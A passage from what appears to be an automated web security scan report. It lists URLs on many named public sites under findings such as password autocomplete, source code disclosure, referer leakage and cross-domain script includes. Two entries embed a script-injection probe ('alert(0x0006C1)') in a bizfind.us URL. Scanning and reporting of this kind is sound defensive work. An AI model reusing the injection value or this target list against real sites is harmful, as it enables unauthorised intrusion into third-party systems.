13.24. https://livechat.boldchat.com/aid/3760177095415339810/bc.chat

13.25. http://mad4milk.net/

13.26. https://mktws.apple.com/acdwsweb/ACDwsAction.do

13.27. http://my.supermedia.com/CammsServlet

13.28. http://nowhiringtoday.jobamatic.com/a/jobs/find-jobs/q-Honda+Research+Development+America/x22

13.29. http://opensource.org/licenses/lgpl-license.php

13.30. http://opensource.org/licenses/mit-license.php

13.31. http://solutions.liveperson.com/ref/lppb.asp

13.32. http://trc.taboolasyndication.com/dispatch/

13.33. http://twitter.com/home

13.34. http://twitter.com/supermedia

13.35. http://videos.smartdesis.com/12948/watch-robo-telugu-movie-online/x22

13.36. http://videos.smartdesis.com/12962/watch-mahesh-khaleja-movie-online-tc-rip/x22

13.37. http://videos.smartdesis.com/13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22

13.38. http://videos.smartdesis.com/13201/watch-rakht-charitra-2-movie-online/x22

13.39. http://videos.smartdesis.com/hindi-online-movies-index/x22

13.40. http://videos.smartdesis.com/page/2/x22

13.41. http://videos.smartdesis.com/tamil-online-movies-index/x22

13.42. http://videos.smartdesis.com/telugu-online-movies-index-a/x22

13.43. http://videos.smartdesis.com/x22

13.44. http://www.amazon.com/SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22

13.45. http://www.amazon.com/s/

13.46. http://www.atlastravelweb.com/

13.47. http://www.bizfind.us/

13.48. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22

13.49. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22

13.50. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

13.51. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

13.52. http://www.bizfind.us/favicon.ico

13.53. http://www.bizfind.us/favicon.ico

13.54. http://www.boldchat.com/

13.55. http://www.butterscotch.com/

13.56. http://www.butterscotch.com/

13.57. http://www.butterscotch.com/tutorials.html

13.58. http://www.descargargratis.com/

13.59. http://www.directorystore.com/

13.60. http://www.expertrating.com/

13.61. http://www.gambleaware.co.uk/

13.62. http://www.ksbe.edu/gallery/postcards.php

13.63. http://www.linkchina.com/wholesale/golf-clubs.html

13.64. http://www.linkedin.com/pub/troy-brown/07/287/56A/x22

13.65. http://www.linkedin.com/shareArticle

13.66. http://www.macraesbluebook.com/search/company.cfm

13.67. http://www.made-in-china.com/

13.68. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22

13.69. http://www.manta.com/c/mm8136k/abc-development-inc/x22

13.70. http://www.myspace.com/Modules/PostTo/Pages/

13.71. http://www.opensource.org/licenses/mit-license.php

13.72. http://www.overstock.com/productxml/

13.73. http://www.qlipso.com/

13.74. http://www.quantcast.com/p-aasG6JkxVvmNA

13.75. http://www.supermedia.com/js/remember.js

13.76. http://www.supermedia.com/spportal/js/cookies.js

13.77. http://www.supermedia.com/spportal/js/header.js

13.78. http://www.supermedia.com/spportal/js/jquery/blockui.js

13.79. http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js

13.80. http://www.supermedia.com/spportal/js/mbox.js

13.81. http://www.supermedia.com/spportal/js/remember.js

13.82. http://www.supermedia.com/spportal/js/s_code.js

13.83. http://www.supermedia.com/spportal/js/supermedia/homepage.js

13.84. http://www.supermedia.com/spportal/style/cobrand.css

13.85. http://www.supermedia.com/spportal/style/supermedia/extended-family.css

13.86. http://www.supermedia.com/spportal/style/supermedia/homepage.css

13.87. http://www.supermedia.com/spportal/style/supermedia/supermedia.css

13.88. https://www.supermedia.com/spportal/spportalFlow.do

13.89. https://www.supermedia.com/spportal/spportalFlow.do

13.90. http://www.switchboard.com/

13.91. http://www.tucows.com/preview/194850/x22

13.92. http://www.veoh.com/rest/v2/execute.xml

13.93. http://www.veoh.com/webplayed.xml

13.94. http://www.waspbarcode.com/scanners/

13.95. http://www.wugnet.com/shareware/spow.asp

13.96. http://102.xg4ken.com/media/redir.php

13.97. http://2e76.v.fwmrm.net/ad/l/1

13.98. http://2e76.v.fwmrm.net/ad/p/1

13.99. http://a9.com/-/spec/opensearch/1.1/

13.100. http://abcnews.go.com/Sports/wireStory

13.101. http://ad.doubleclick.net/ad/N3671.msnmidfunnel.com/B5159652.21

13.102. http://ad.doubleclick.net/ad/N6421.152847.MSN.COM/B5094800.20

13.103. http://ad.trafficmp.com/a/bpix

13.104. http://ad.trafficmp.com/a/bpix

13.105. http://ad.trafficmp.com/a/bpix

13.106. http://ad.trafficmp.com/a/js

13.107. http://ad.trafficmp.com/a/js

13.108. http://ad.trafficmp.com/a/js

13.109. http://ad.trafficmp.com/a/js

13.110. http://ad.trafficmp.com/a/js

13.111. http://ad.trafficmp.com/a/js

13.112. http://ad.trafficmp.com/a/js

13.113. http://ad.trafficmp.com/a/js

13.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1765474321

13.115. http://ad.yieldmanager.com/pixel

13.116. http://ads.adap.tv/beacons

13.117. http://ads.adap.tv/cookie

13.118. http://ads.adap.tv/favicon.ico

13.119. http://ads.cpxadroit.com/adserver/5JK3H6H2EC5.gif

13.120. http://ads.owasp.org/www/delivery/lg.php

13.121. http://ads.veoh.com/openx/www/delivery/ajs.php

13.122. http://advertising.superpages.com/img/img-spportal/banners/smallverisign.jpg

13.123. http://affiliates.digitalriver.com/42/112156/287

13.124. http://app.insightgrit.com/Visit37.php

13.125. http://app.scanscout.com/ssframework/adStreamJSController.htm

13.126. http://app.scanscout.com/ssframework/adStreamJSController.xml

13.127. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa

13.128. http://ar.voicefive.com/bmx3/broker.pli

13.129. http://audience.visiblemeasures.com/u/getuid/

13.130. http://audience.visiblemeasures.com/u/getuid/

13.131. http://b.scorecardresearch.com/b

13.132. http://b.scorecardresearch.com/p

13.133. http://blog.supermedia.com/

13.134. http://blog.supermedia.com/2011/01/2011-changes/

13.135. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

13.136. http://blog.supermedia.com/2011/01/getting-in-shape-tips/

13.137. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/

13.138. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/

13.139. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/

13.140. http://blog.supermedia.com/2011/02/build-brand/

13.141. http://blog.supermedia.com/2011/02/go-marketing/

13.142. http://blog.supermedia.com/2011/02/planning-appreciation-events/

13.143. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/

13.144. http://blog.supermedia.com/archives/

13.145. http://blog.supermedia.com/archives/news/

13.146. http://blog.supermedia.com/archives/newsletters/

13.147. http://blog.supermedia.com/archives/press-releases/

13.148. http://blog.supermedia.com/archives/tips/

13.149. http://blog.supermedia.com/comment_form.php

13.150. http://blog.supermedia.com/comment_html.php

13.151. http://blog.supermedia.com/favicon.ico

13.152. http://blog.supermedia.com/feed-icon-28x28.png

13.153. http://blog.supermedia.com/feed/

13.154. http://blog.supermedia.com/feed/atom/

13.155. http://blog.supermedia.com/main.css

13.156. http://blogsearch.google.com/

13.157. http://books.google.com/bkshp

13.158. http://books.google.com/books

13.159. http://bp.specificclick.net/

13.160. http://buzz.yahoo.com/buzz

13.161. http://c.redcated/c.gif

13.162. http://clk.redcated/AVE/go/285974183/direct

13.163. http://clk.redcated/AVE/go/286182932/direct/01/]]

13.164. http://code.google.com/p/simplemodal/

13.165. http://code.google.com/p/swfobject/

13.166. http://core.insightexpressai.com/adServer/adServerESI.aspx

13.167. http://delicious.com/save

13.168. http://developer.yahoo.com/yui/

13.169. http://developer.yahoo.com/yui/license.html

13.170. http://digg.com/submit

13.171. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json

13.172. http://dt.scanscout.com/ssframework/dt/pt.png

13.173. http://edge.quantserve.com/quant.js

13.174. http://forums.digitalpoint.com/showthread.php

13.175. http://googleads.g.doubleclick.net/pagead/ads

13.176. http://googleads.g.doubleclick.net/pagead/ads

13.177. http://groups.google.com/grphp

13.178. http://hit.clickaider.com/clickaider.js

13.179. http://hit.clickaider.com/pv

13.180. http://l0.scanscout.com/ssframework/log/log.png

13.181. http://load.exelator.com/load/

13.182. http://maps.google.com/maps

13.183. http://maps.google.com/maps/stk/lc

13.184. http://maps.google.com/maps/vp

13.185. http://mobile.jackpotcity.com/

13.186. http://pixel.quantserve.com/api/segments.json

13.187. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22

13.188. http://qooxdoo.org/

13.189. http://scholar.google.com/schhp

13.190. http://scholar.google.com/scholar

13.191. http://shopping.yahoo.com/search

13.192. http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

13.193. http://store.apple.com/us-hed/findyourschool

13.194. http://store.apple.com/us-hed/go/home

13.195. http://store.apple.com/us_smb_78313

13.196. https://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

13.197. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

13.198. http://storechat.apple.com/hc/6964264/

13.199. http://storechat.apple.com/hc/6964264/

13.200. http://storechat.apple.com/hc/6964264/

13.201. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389

13.202. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075

13.203. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156

13.204. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604

13.205. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958

13.206. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617

13.207. http://tags.bluekai.com/site/2174

13.208. http://tags.bluekai.com/site/2491

13.209. http://tags.bluekai.com/site/353

13.210. http://tags.bluekai.com/site/365

13.211. http://translate.google.com/

13.212. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/

13.213. http://uat.netmng.com/pixel/

13.214. http://video.google.com/

13.215. http://w.ic.tynt.com/b/o

13.216. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

13.217. http://www.dhgate.com/

13.218. http://www.everycarlisted.com/

13.219. http://www.facebook.com/

13.220. http://www.facebook.com/2008/fbml

13.221. http://www.facebook.com/home.php

13.222. http://www.facebook.com/pages/Veoh/129836657035793

13.223. http://www.facebook.com/share.php

13.224. http://www.facebook.com/supermediacom

13.225. http://www.flickr.com/search/

13.226. https://www.google.com/accounts/Login

13.227. https://www.google.com/accounts/ServiceLogin

13.228. http://www.inceptor.com/

13.229. http://www.jackpotcity.com/online-casino/

13.230. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

13.231. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863

13.232. http://www.linkedin.com/in/troyd/x22

13.233. http://www.localsearch.com/

13.234. http://www.milanoo.com/

13.235. http://www.msn.com/

13.236. http://www.mybloglog.com/buzz/members/smartdesis/x22

13.237. http://www.omniture.com/

13.238. http://www.orbitz.com/tealeaf.jsp

13.239. http://www.owasp.org/index.php/Top_10_2010-A2

13.240. http://www.smartdraw.com/specials/sd/buy-sd.htm

13.241. http://www.smartdraw.com/specials/smartdraw.asp

13.242. http://www.stumbleupon.com/submit

13.243. http://www.superpages.com/

13.244. http://www.superpages.com/inc/social/sln.php

13.245. http://www.superpages.com/inc/social/soc.css

13.246. http://www.superpages.com/inc/social/soc.php

13.247. http://www.superpages.com/inc/social/soc_email.php/

13.248. http://www.superpages.com/superguarantee/

13.249. http://www.supertradeexchange.com/

13.250. http://www.tucows.com/

13.251. http://www.tucows.com/about.html

13.252. http://www.tucows.com/advertise.html

13.253. http://www.tucows.com/affiliate/index.html

13.254. http://www.tucows.com/author_ratings.html

13.255. http://www.tucows.com/contact.html

13.256. http://www.tucows.com/images/newassets/contact.html

13.257. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

13.258. http://www.tucows.com/images/newassets/includes/js/aalib.js

13.259. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

13.260. http://www.tucows.com/images/newassets/includes/js/show_layer.js

13.261. http://www.tucows.com/images/newassets/includes/js/signupin.js

13.262. http://www.tucows.com/images/newassets/includes/js/x_core.js

13.263. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

13.264. http://www.tucows.com/images/newassets/includes/js/yetii.js

13.265. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

13.266. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

13.267. http://www.tucows.com/images/newassets/javascript:void(null)

13.268. http://www.tucows.com/images/newassets/lostpass.html

13.269. http://www.tucows.com/images/newassets/privacy.html

13.270. http://www.tucows.com/images/newassets/safesearchtoggle.html

13.271. http://www.tucows.com/images/newassets/search.html

13.272. http://www.tucows.com/images/newassets/sitemap.html

13.273. http://www.tucows.com/images/newassets/terms.html

13.274. http://www.tucows.com/images/newassets/warningcow200.png

13.275. http://www.tucows.com/index.html

13.276. http://www.tucows.com/preview/194850/x22

13.277. http://www.tucows.com/privacy.html

13.278. http://www.tucows.com/sitemap.html

13.279. http://www.tucows.com/software.html

13.280. http://www.tucows.com/terms.html

13.281. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

13.282. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

13.283. http://www.wix.com/

13.284. http://www.youtube.com/

13.285. http://www.youtube.com/results

13.286. http://www.youtube.com/watch

13.287. http://www8.tucows.com/delivery/afr.php

13.288. http://www8.tucows.com/delivery/ck.php

13.289. http://www8.tucows.com/delivery/lg.php

14. Password field with autocomplete enabled

14.1. http://advertise.tucows.com/

14.2. http://advertise.tucows.com/

14.3. https://author.tucows.com/

14.4. http://boardreader.com/my.html

14.5. https://bugzilla.mozilla.org/show_bug.cgi

14.6. https://bugzilla.mozilla.org/show_bug.cgi

14.7. https://bugzilla.mozilla.org/show_bug.cgi

14.8. https://bugzilla.mozilla.org/show_bug.cgi

14.9. http://digg.com/submit

14.10. http://digg.com/submit

14.11. http://forums.digitalpoint.com/showthread.php

14.12. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

14.13. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

14.14. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

14.15. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

14.16. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

14.17. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1

14.18. http://twitter.com/supermedia

14.19. http://www.butterscotch.com/

14.20. http://www.butterscotch.com/

14.21. http://www.butterscotch.com/

14.22. http://www.butterscotch.com/tutorials.html

14.23. http://www.butterscotch.com/tutorials.html

14.24. http://www.ericmmartin.com/projects/simplemodal/

14.25. http://www.facebook.com/

14.26. http://www.facebook.com/

14.27. http://www.facebook.com/2008/fbml

14.28. http://www.facebook.com/share.php

14.29. http://www.facebook.com/supermediacom

14.30. https://www.google.com/accounts/Login

14.31. https://www.google.com/accounts/ServiceLogin

14.32. http://www.linkedin.com/shareArticle

14.33. http://www.made-in-china.com/

14.34. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22

14.35. http://www.manta.com/c/mm8136k/abc-development-inc/x22

14.36. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/

14.37. http://www.supertradeexchange.com/

14.38. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22

14.39. http://www.tucows.com/

14.40. http://www.tucows.com/

14.41. http://www.tucows.com/about.html

14.42. http://www.tucows.com/about.html

14.43. http://www.tucows.com/advertise.html

14.44. http://www.tucows.com/advertise.html

14.45. http://www.tucows.com/affiliate/index.html

14.46. http://www.tucows.com/affiliate/index.html

14.47. http://www.tucows.com/author_ratings.html

14.48. http://www.tucows.com/author_ratings.html

14.49. http://www.tucows.com/contact.html

14.50. http://www.tucows.com/contact.html

14.51. http://www.tucows.com/images/newassets/contact.html

14.52. http://www.tucows.com/images/newassets/contact.html

14.53. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

14.54. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

14.55. http://www.tucows.com/images/newassets/includes/js/aalib.js

14.56. http://www.tucows.com/images/newassets/includes/js/aalib.js

14.57. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

14.58. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

14.59. http://www.tucows.com/images/newassets/includes/js/show_layer.js

14.60. http://www.tucows.com/images/newassets/includes/js/show_layer.js

14.61. http://www.tucows.com/images/newassets/includes/js/signupin.js

14.62. http://www.tucows.com/images/newassets/includes/js/signupin.js

14.63. http://www.tucows.com/images/newassets/includes/js/x_core.js

14.64. http://www.tucows.com/images/newassets/includes/js/x_core.js

14.65. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

14.66. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

14.67. http://www.tucows.com/images/newassets/includes/js/yetii.js

14.68. http://www.tucows.com/images/newassets/includes/js/yetii.js

14.69. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

14.70. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

14.71. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

14.72. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

14.73. http://www.tucows.com/images/newassets/javascript:void(null)

14.74. http://www.tucows.com/images/newassets/javascript:void(null)

14.75. http://www.tucows.com/images/newassets/lostpass.html

14.76. http://www.tucows.com/images/newassets/lostpass.html

14.77. http://www.tucows.com/images/newassets/privacy.html

14.78. http://www.tucows.com/images/newassets/privacy.html

14.79. http://www.tucows.com/images/newassets/safesearchtoggle.html

14.80. http://www.tucows.com/images/newassets/safesearchtoggle.html

14.81. http://www.tucows.com/images/newassets/search.html

14.82. http://www.tucows.com/images/newassets/search.html

14.83. http://www.tucows.com/images/newassets/sitemap.html

14.84. http://www.tucows.com/images/newassets/sitemap.html

14.85. http://www.tucows.com/images/newassets/terms.html

14.86. http://www.tucows.com/images/newassets/terms.html

14.87. http://www.tucows.com/images/newassets/warningcow200.png

14.88. http://www.tucows.com/images/newassets/warningcow200.png

14.89. http://www.tucows.com/index.html

14.90. http://www.tucows.com/index.html

14.91. http://www.tucows.com/preview/194850/x22

14.92. http://www.tucows.com/preview/194850/x22

14.93. http://www.tucows.com/privacy.html

14.94. http://www.tucows.com/privacy.html

14.95. http://www.tucows.com/sitemap.html

14.96. http://www.tucows.com/sitemap.html

14.97. http://www.tucows.com/software.html

14.98. http://www.tucows.com/software.html

14.99. http://www.tucows.com/terms.html

14.100. http://www.tucows.com/terms.html

14.101. http://www.veoh.com/favorites

14.102. http://www.veoh.com/login

14.103. http://www.veoh.com/messages/inbox

14.104. http://www.veoh.com/myinterests

14.105. http://www.veoh.com/myplaylists

14.106. http://www.veoh.com/myprofile/videos

14.107. http://www.veoh.com/publish/video

14.108. http://www.veoh.com/register

15. Source code disclosure

15.1. http://advertise.tucows.com/includes/js/ajaxlib.js

15.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

15.3. http://mobile.jackpotcity.com/js/genericfunctions.js

15.4. http://www.agame.com/

15.5. http://www.games.co.uk/

15.6. http://www.jackpotcity.com/js/genericfunctions.js

15.7. http://www.tucows.com/includes/js/ajaxlib.js

16. Referer-dependent response

16.1. http://www.facebook.com/extern/login_status.php

16.2. http://www.facebook.com/plugins/like.php

16.3. http://www8.tucows.com/delivery/afr.php

17. Cross-domain POST

18. Cross-domain Referer leakage

18.1. http://abcnews.go.com/Sports/wireStory

18.2. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23

18.3. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24

18.4. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

18.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

18.6. http://ad.doubleclick.net/adi/lb.buzzillions/

18.7. http://ad.doubleclick.net/adi/lb.buzzillions/

18.8. http://ad.doubleclick.net/adi/lb.buzzillions/

18.9. http://ad.doubleclick.net/adi/lb.buzzillions/

18.10. http://ad.doubleclick.net/adi/lb.buzzillions/

18.11. http://app.scanscout.com/ssframework/adStreamJSController.htm

18.12. http://app.scanscout.com/ssframework/adStreamJSController.htm

18.13. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa

18.14. http://blogsearch.google.com/

18.15. http://boardreader.com/index.php

18.16. http://books.google.com/bkshp

18.17. http://books.google.com/books

18.18. https://bugzilla.mozilla.org/show_bug.cgi

18.19. http://cdn.unicast.msn.com/assets/A352/N24609/M12223/P1473/Q65369/script_300_250.js

18.20. http://clicktoverify.truste.com/pvr.php

18.21. http://content.veoh.com/flash/f/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll

18.22. http://content.veoh.com/flash/f/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll

18.23. http://content.veoh.com/flash/f/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll

18.24. http://content.veoh.com/flash/f/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll

18.25. http://content.veoh.com/flash/f/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll

18.26. http://content.veoh.com/flash/f/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll

18.27. http://content.veoh.com/flash/f/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll

18.28. http://content.veoh.com/flash/f/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll

18.29. http://content.veoh.com/flash/i/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.mp4

18.30. http://content.veoh.com/flash/i/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.mp4

18.31. http://content.veoh.com/flash/i/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.mp4

18.32. http://content.veoh.com/flash/i/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.mp4

18.33. http://content.veoh.com/flash/i/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.mp4

18.34. http://content.veoh.com/flash/i/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.mp4

18.35. http://content.veoh.com/flash/i/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.mp4

18.36. http://content.veoh.com/flash/i/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.mp4

18.37. http://content.veoh.com/flash/p/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll

18.38. http://content.veoh.com/flash/p/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll

18.39. http://content.veoh.com/flash/p/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll

18.40. http://content.veoh.com/flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll

18.41. http://content.veoh.com/flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll

18.42. http://content.veoh.com/flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll

18.43. http://content.veoh.com/flash/p/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll

18.44. http://content.veoh.com/flash/p/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll

18.45. http://content.veoh.com/flash/p/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll

18.46. http://content.veoh.com/flash/p/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll

18.47. http://content.veoh.com/flash/p/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll

18.48. http://core.videoegg.com/eap/12368/html/jstags.html

18.49. http://delicious.com/save

18.50. http://digg.com/submit

18.51. http://digg.com/submit

18.52. http://forums.digitalpoint.com/showthread.php

18.53. http://googleads.g.doubleclick.net/pagead/ads

18.54. http://googleads.g.doubleclick.net/pagead/ads

18.55. http://googleads.g.doubleclick.net/pagead/ads

18.56. http://googleads.g.doubleclick.net/pagead/ads

18.57. http://googleads.g.doubleclick.net/pagead/ads

18.58. http://googleads.g.doubleclick.net/pagead/ads

18.59. http://googleads.g.doubleclick.net/pagead/ads

18.60. http://googleads.g.doubleclick.net/pagead/ads

18.61. http://googleads.g.doubleclick.net/pagead/ads

18.62. http://googleads.g.doubleclick.net/pagead/ads

18.63. http://googleads.g.doubleclick.net/pagead/ads

18.64. http://googleads.g.doubleclick.net/pagead/ads

18.65. http://googleads.g.doubleclick.net/pagead/ads

18.66. http://googleads.g.doubleclick.net/pagead/ads

18.67. http://googleads.g.doubleclick.net/pagead/ads

18.68. http://groups.google.com/grphp

18.69. http://ir.supermedia.com/common/mobile/

18.70. http://ir.supermedia.com/contactus.cfm

18.71. http://ir.supermedia.com/contactus.cfm

18.72. http://ir.supermedia.com/eventdetail.cfm

18.73. http://ir.supermedia.com/index.cfm

18.74. http://ir.supermedia.com/releasedetail.cfm

18.75. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewFeature

18.76. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMovie

18.77. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMultiRoom

18.78. http://itunes.apple.com/us/album/i-need-doctor-feat-eminem/id415573229

18.79. http://itunes.apple.com/us/app/dead-space/id396018321

18.80. http://itunes.apple.com/us/app/the-daily/id411516732

18.81. http://itunes.apple.com/us/app/wild-about-books/id407309460

18.82. http://itunes.apple.com/us/artist/the-beatles/id136975

18.83. http://itunes.apple.com/us/genre/mobile-software-applications/id36

18.84. http://livechat.boldchat.com/aid/3760177095415339810/bc.chat

18.85. http://ll-appserver.veoh.com/scripts/veoh.js

18.86. http://load.exelator.com/load/

18.87. http://managedq.com/search.php

18.88. http://maps.google.com/maps

18.89. http://maps.google.com/maps

18.90. http://maps.google.com/maps

18.91. http://maps.google.com/maps/stk/lc

18.92. http://mobile.jackpotcity.com/

18.93. http://my.supermedia.com/directoryoptout/

18.94. http://my.supermedia.com/directoryoptout/index.jsp

18.95. http://news.google.com/nwshp

18.96. http://rad.msn.com/ADSAdClient31.dll

18.97. http://rad.msn.com/ADSAdClient31.dll

18.98. http://rad.msn.com/ADSAdClient31.dll

18.99. http://rad.msn.com/ADSAdClient31.dll

18.100. http://scholar.google.com/schhp

18.101. http://shopping.yahoo.com/search

18.102. http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

18.103. http://store.apple.com/Catalog/US/Images/intlstoreroutingpage.html

18.104. http://store.apple.com/us/browse/campaigns/new_to_mac

18.105. http://store.apple.com/us/browse/home/giftcards

18.106. http://store.apple.com/us/browse/home/shop_ipad/family/ipad

18.107. http://store.apple.com/us/browse/home/shop_iphone/family/iphone

18.108. http://store.apple.com/us/cart

18.109. http://store.apple.com/us/instant_credit

18.110. http://store.apple.com/us/product/MC660Z/A

18.111. https://store.apple.com/us/sign_in

18.112. http://translate.google.com/

18.113. http://video.google.com/

18.114. http://www.abc3340.com/Global/story.asp

18.115. http://www.amazon.com/s/

18.116. http://www.butterscotch.com/

18.117. http://www.cloudscan.me/search

18.118. http://www.facebook.com/plugins/like.php

18.119. http://www.facebook.com/plugins/like.php

18.120. http://www.facebook.com/share.php

18.121. http://www.flickr.com/search/

18.122. http://www.jackpotcity.com/exit/flashcasino/tracking.aspx

18.123. http://www.macromedia.com/shockwave/download/index.cgi

18.124. http://www.msn.com/

18.125. http://www.msn.com/

18.126. http://www.smartdraw.com/specials/sd/buy-sd.htm

18.127. http://www.smartdraw.com/specials/smartdraw.asp

18.128. http://www.stumbleupon.com/submit

18.129. http://www.supermedia.com/spportal/landingpages.do

18.130. https://www.supermedia.com/spportal/spportalFlow.do

18.131. https://www.supermedia.com/spportal/spportalFlow.do

18.132. http://www.thumbshots.net/search.aspx

18.133. http://www.thumbshots.net/webguide.aspx

18.134. http://www.tucows.com/software.html

18.135. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

18.136. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

18.137. http://www.veoh.com/publish/video

18.138. http://www.wix.com/

18.139. http://www.youtube.com/

18.140. http://www.youtube.com/

18.141. http://www8.tucows.com/delivery/afr.php

18.142. http://www8.tucows.com/delivery/afr.php

18.143. http://www8.tucows.com/delivery/afr.php

18.144. http://www8.tucows.com/delivery/afr.php

19. Cross-domain script include

19.1. http://abcconstructioninc.com/x22

19.2. http://abcnews.go.com/Sports/wireStory

19.3. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23

19.4. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24

19.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

19.6. http://ad.doubleclick.net/adi/lb.buzzillions/

